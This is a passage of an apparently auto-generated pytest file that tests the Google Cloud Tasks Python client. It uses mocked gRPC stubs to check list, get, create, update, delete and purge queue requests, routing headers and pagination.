call.return_value = cloudtasks.ListQueuesResponse()
client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_queues_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_queues_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
def test_list_queues_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_queues_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
@pytest.mark.asyncio
async def test_list_queues_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
def test_list_queues_pager():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_queues(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, queue.Queue) for i in results)
def test_list_queues_pages():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = list(client.list_queues(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_queues_async_pager():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
async_pager = await client.list_queues(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, queue.Queue) for i in responses)
@pytest.mark.asyncio
async def test_list_queues_async_pages():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_queues(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_get_queue(transport: str = "grpc", request_type=cloudtasks.GetQueueRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_get_queue_from_dict():
test_get_queue(request_type=dict)
@pytest.mark.asyncio
async def test_get_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.GetQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_get_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_queue), "__call__") as call:
call.return_value = queue.Queue()
client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_get_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_get_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
def test_create_queue(
transport: str = "grpc", request_type=cloudtasks.CreateQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_create_queue_from_dict():
test_create_queue(request_type=dict)
@pytest.mark.asyncio
async def test_create_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.CreateQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
)
)
response = await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_create_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].queue == gct_queue.Queue(name="name_value")
def test_create_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].queue == gct_queue.Queue(name="name_value")
@pytest.mark.asyncio
async def test_create_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
def test_update_queue(
transport: str = "grpc", request_type=cloudtasks.UpdateQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_update_queue_from_dict():
test_update_queue(request_type=dict)
@pytest.mark.asyncio
async def test_update_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.UpdateQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.update_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
type=gct_queue.Queue.Type.PULL,
)
)
response = await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
assert response.type == gct_queue.Queue.Type.PULL
def test_update_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.update_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.update_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
def test_update_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].queue == gct_queue.Queue(name="name_value")
assert args[0].update_mask == field_mask.FieldMask(paths=["paths_value"])
def test_update_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.update_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].queue == gct_queue.Queue(name="name_value")
assert args[0].update_mask == field_mask.FieldMask(paths=["paths_value"])
@pytest.mark.asyncio
async def test_update_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask.FieldMask(paths=["paths_value"]),
)
def test_delete_queue(
transport: str = "grpc", request_type=cloudtasks.DeleteQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_queue_from_dict():
test_delete_queue(request_type=dict)
@pytest.mark.asyncio
async def test_delete_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.DeleteQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_delete_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_queue), "__call__") as call:
call.return_value = None
client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_delete_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_delete_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
def test_purge_queue(
transport: str = "grpc", request_type=cloudtasks.PurgeQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_purge_queue_from_dict():
test_purge_queue(request_type=dict)
@pytest.mark.asyncio
async def test_purge_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.PurgeQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.purge_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_purge_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.purge_queue), "__call__") as call:
call.return_value = queue.Queue()
client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.purge_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
